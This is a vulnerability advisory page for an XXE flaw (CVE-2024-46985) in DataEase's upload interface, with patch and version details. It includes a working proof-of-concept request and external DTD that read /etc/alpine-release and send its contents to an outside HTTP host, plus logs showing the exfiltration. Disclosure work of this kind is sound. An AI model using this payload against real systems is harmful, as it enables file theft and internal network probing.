Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS00bTlwLTd4ZzYtZjRtbc4AA_ul
DataEase has an XML External Entity Reference vulnerability
Impact
The static resource upload interface of DataEase is vulnerable to XML external entity (XXE) injection. An attacker can construct a payload to probe the internal network and read files.
- Send the request:
POST /de2api/staticResource/upload/1 HTTP/1.1
Host: dataease.ubuntu20.vm
Content-Length: 348
Accept: application/json, text/plain, */*
out_auth_platform: default
X-DE-TOKEN: jwt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6OZBNygiUCAZEbMn

------WebKitFormBoundary6OZBNygiUCAZEbMn
Content-Disposition: form-data; name="file"; filename="1.svg"
Content-Type: a

<?xml version='1.0'?>
<!DOCTYPE xxe [
<!ENTITY % EvilDTD SYSTEM 'http://10.168.174.1:8000/1.dtd'>
%EvilDTD;
%LoadOOBEnt;
%OOB;
]>
------WebKitFormBoundary6OZBNygiUCAZEbMn--
// Contents of 1.dtd
<!ENTITY % resource SYSTEM "file:///etc/alpine-release">
<!ENTITY % LoadOOBEnt "<!ENTITY % OOB SYSTEM 'http://10.168.174.1:8000/?content=%resource;'>">
- After the request is sent, the content of the file /etc/alpine-release is successfully read:
::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /1.dtd HTTP/1.1" 200 -
::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /?content=3.20.0 HTTP/1.1" 200 -
Affected versions: <= 2.10.0
Patches
The vulnerability has been fixed in v2.10.1.
Workarounds
It is recommended to upgrade the version to v2.10.1.
References
If you have any questions or comments about this advisory:
Open an issue in https://github.com/dataease/dataease
Email us at [email protected]
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00bTlwLTd4ZzYtZjRtbc4AA_ul
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: about 2 months ago
Updated: about 2 months ago
CVSS Score: 7.5
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Identifiers: GHSA-4m9p-7xg6-f4mm, CVE-2024-46985
References:
- https://github.com/dataease/dataease/security/advisories/GHSA-4m9p-7xg6-f4mm
- https://nvd.nist.gov/vuln/detail/CVE-2024-46985
- https://github.com/advisories/GHSA-4m9p-7xg6-f4mm
Blast Radius: 1.0
Affected Packages
maven:io.dataease:common
Affected Version Ranges: <= 2.10.0
Fixed in: 2.10.1